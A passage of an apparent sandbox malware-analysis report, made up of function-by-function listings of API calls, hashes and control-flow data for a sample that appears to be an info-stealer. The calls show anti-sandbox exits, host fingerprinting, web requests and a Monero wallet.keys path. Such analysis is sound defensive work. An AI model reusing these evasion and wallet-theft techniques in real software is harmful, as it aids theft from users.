                              • Opcode Fuzzy Hash: fb0910648c83645c50d2b80d5c276197fe004c43f7dad280c6aeb377545eff0a
                              • Instruction Fuzzy Hash: F6515CB4A00209EFDB04DFA4D964BBE77B6BF45705F10815DE906AB380D770E94ACB62
                              Function 00657500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 657500-65754a GetWindowsDirectoryA 1357 657553-6575c7 GetVolumeInformationA call 658d00 * 3 1356->1357 1358 65754c 1356->1358 1365 6575d8-6575df 1357->1365 1358->1357 1366 6575e1-6575fa call 658d00 1365->1366 1367 6575fc-657617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 657619-657626 call 65a740 1367->1369 1370 657628-657658 wsprintfA call 65a740 1367->1370 1377 65767e-65768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00657542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0065757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0065760A
                              • wsprintfA.USER32 ref: 00657640
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$f
                              • API String ID: 1544550907-921915378
                              • Opcode ID: 1f272d2977b319466bb96adf4f6c737982952c7375790e38efcab85b629ad562
                              • Instruction ID: e34365225181266e63ecdaff1072e3b47ab8e9e864e9be2cf893363667528b83
                              • Opcode Fuzzy Hash: 1f272d2977b319466bb96adf4f6c737982952c7375790e38efcab85b629ad562
                              • Instruction Fuzzy Hash: BA4183B1D04248EBDB14DF98DC45BDEBBB9FF18701F100199F90967280EB75AA48CBA5
                              Function 006569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1630), ref: 006598A1
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1540), ref: 006598BA
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1558), ref: 006598D2
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D15B8), ref: 006598EA
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D16A8), ref: 00659903
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D8B38), ref: 0065991B
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013C52B0), ref: 00659933
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013C5310), ref: 0065994C
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D15D0), ref: 00659964
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D16D8), ref: 0065997C
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D16C0), ref: 00659995
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1600), ref: 006599AD
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013C5170), ref: 006599C5
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1570), ref: 006599DE
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 006411D0: ExitProcess.KERNEL32 ref: 00641211
                                • Part of subcall function 00641160: GetSystemInfo.KERNEL32(?), ref: 0064116A
                                • Part of subcall function 00641160: ExitProcess.KERNEL32 ref: 0064117E
                                • Part of subcall function 00641110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0064112B
                                • Part of subcall function 00641110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00641132
                                • Part of subcall function 00641110: ExitProcess.KERNEL32 ref: 00641143
                                • Part of subcall function 00641220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0064123E
                                • Part of subcall function 00641220: __aulldiv.LIBCMT ref: 00641258
                                • Part of subcall function 00641220: __aulldiv.LIBCMT ref: 00641266
                                • Part of subcall function 00641220: ExitProcess.KERNEL32 ref: 00641294
                                • Part of subcall function 00656770: GetUserDefaultLangID.KERNEL32 ref: 00656774
                                • Part of subcall function 00641190: ExitProcess.KERNEL32 ref: 006411C6
                                • Part of subcall function 00657850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006411B7), ref: 00657880
                                • Part of subcall function 00657850: RtlAllocateHeap.NTDLL(00000000), ref: 00657887
                                • Part of subcall function 00657850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0065789F
                                • Part of subcall function 006578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657910
                                • Part of subcall function 006578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00657917
                                • Part of subcall function 006578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0065792F
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013D8C28,?,0066110C,?,00000000,?,00661110,?,00000000,00660AEF), ref: 00656ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00656AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00656AF9
                              • Sleep.KERNEL32(00001770), ref: 00656B04
                              • CloseHandle.KERNEL32(?,00000000,?,013D8C28,?,0066110C,?,00000000,?,00661110,?,00000000,00660AEF), ref: 00656B1A
                              • ExitProcess.KERNEL32 ref: 00656B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 136f8ee2564c301019892b75a22a935df0cd6a3102b7bea55e6dfb2cf67fe1c8
                              • Instruction ID: 8c02888f44726c738184cf9128584ea240c74c0f3c9a430efa172446e5715054
                              • Opcode Fuzzy Hash: 136f8ee2564c301019892b75a22a935df0cd6a3102b7bea55e6dfb2cf67fe1c8
                              • Instruction Fuzzy Hash: 67313070910108AAEB44F7F0DC56BEE777ABF14302F50461DF902A61D1EF706949C7AA
                              Function 00641220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 641220-641247 call 6589b0 GlobalMemoryStatusEx 1439 641273-64127a 1436->1439 1440 641249-641271 call 65da00 * 2 1436->1440 1442 641281-641285 1439->1442 1440->1442 1444 641287 1442->1444 1445 64129a-64129d 1442->1445 1447 641292-641294 ExitProcess 1444->1447 1448 641289-641290 1444->1448 1448->1445 1448->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0064123E
                              • __aulldiv.LIBCMT ref: 00641258
                              • __aulldiv.LIBCMT ref: 00641266
                              • ExitProcess.KERNEL32 ref: 00641294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: be3a615fe10ae612c260d88a3292f18bb8a3b3e255a17c46cc65a250c9100c08
                              • Instruction ID: b551c6fe610ef60dc42cd9aea8687bddb332cd875a47a17df5586ed1d5fb8207
                              • Opcode Fuzzy Hash: be3a615fe10ae612c260d88a3292f18bb8a3b3e255a17c46cc65a250c9100c08
                              • Instruction Fuzzy Hash: 4701FBB0A44308FAEB10EBE4CC49B9EBB79AB15706F208159E705FA2C0D7B456C58799
                              Function 00656AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 656af3 1451 656b0a 1450->1451 1453 656b0c-656b22 call 656920 call 655b10 CloseHandle ExitProcess 1451->1453 1454 656aba-656ad7 call 65aad0 OpenEventA 1451->1454 1460 656af5-656b04 CloseHandle Sleep 1454->1460 1461 656ad9-656af1 call 65aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013D8C28,?,0066110C,?,00000000,?,00661110,?,00000000,00660AEF), ref: 00656ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00656AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00656AF9
                              • Sleep.KERNEL32(00001770), ref: 00656B04
                              • CloseHandle.KERNEL32(?,00000000,?,013D8C28,?,0066110C,?,00000000,?,00661110,?,00000000,00660AEF), ref: 00656B1A
                              • ExitProcess.KERNEL32 ref: 00656B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: d8589b5496296d52efdfafd303c2763644006d135f73a0b8b1837b21cf6f8789
                              • Instruction ID: 02fa8e5fecf444772ae882ff156bf54eed13eb4f310fb8cd8ec5f78d65e6c9c2
                              • Opcode Fuzzy Hash: d8589b5496296d52efdfafd303c2763644006d135f73a0b8b1837b21cf6f8789
                              • Instruction Fuzzy Hash: 42F05E70940209ABF740ABA0DD1ABBD7B75FF04702F904519BD13A21D1DBB05549D76A
                              Function 006447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: a7b073f9ac58d3854a5e7f55ba653d1608b69c936465b2a4c79ea462ef115f4a
                              • Instruction ID: 683bcecc9263d6f94b8050bcc202907ba6c356ebc4d8f3a02d2a6a462c4ec124
                              • Opcode Fuzzy Hash: a7b073f9ac58d3854a5e7f55ba653d1608b69c936465b2a4c79ea462ef115f4a
                              • Instruction Fuzzy Hash: A7214FB1D00209ABDF14DFA4E845ADE7B75FB45320F108629F955A72C0EB706A09CF81
                              Function 006551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 00646280: InternetOpenA.WININET(00660DFE,00000001,00000000,00000000,00000000), ref: 006462E1
                                • Part of subcall function 00646280: StrCmpCA.SHLWAPI(?,013DEC50), ref: 00646303
                                • Part of subcall function 00646280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00646335
                                • Part of subcall function 00646280: HttpOpenRequestA.WININET(00000000,GET,?,013DE238,00000000,00000000,00400100,00000000), ref: 00646385
                                • Part of subcall function 00646280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006463BF
                                • Part of subcall function 00646280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006463D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00655228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 363a3a20e272b2559a3218a86e97f4fa0b1da7d8d838371133be199795487219
                              • Instruction ID: 518c8400fe940e08acec1c1ada1cbf87e2f199aba1f584dcc8603c6a4e28df5d
                              • Opcode Fuzzy Hash: 363a3a20e272b2559a3218a86e97f4fa0b1da7d8d838371133be199795487219
                              • Instruction Fuzzy Hash: C6113370900108A7CB54FFA4DD52AED773AAF50301F40425CFC1A5A192EF30AB0EC795
                              Function 006578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00657917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0065792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: cb7a0ae276c3ee581b8d7c34bf9c061afebad9dc1dffe6ec1721f0dad0eeb8e8
                              • Instruction ID: fc3f021cafb1c0db3785f310a202fb99f76e2f72814d945f20457a163a90f43e
                              • Opcode Fuzzy Hash: cb7a0ae276c3ee581b8d7c34bf9c061afebad9dc1dffe6ec1721f0dad0eeb8e8
                              • Instruction Fuzzy Hash: C80181B1A04208EBD714DF98DD45FAAFBB9FB04B22F10422AFA45E32C0C37559048BB1
                              Function 00641110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0064112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00641132
                              • ExitProcess.KERNEL32 ref: 00641143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 04f759a7ccafb6396e0da882eddb37844e36e5d38f6a9bde56439e569256e4fe
                              • Instruction ID: 04e1c79afa58e02a90d55bb23a0e0023a2acb62132e3fcfde396715ffaebbc02
                              • Opcode Fuzzy Hash: 04f759a7ccafb6396e0da882eddb37844e36e5d38f6a9bde56439e569256e4fe
                              • Instruction Fuzzy Hash: B8E0867094530CFBF714ABA49C0AB087678BB04B41F100055F7087B1C0C6B42640979A
                              Function 006410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006410B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006410F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
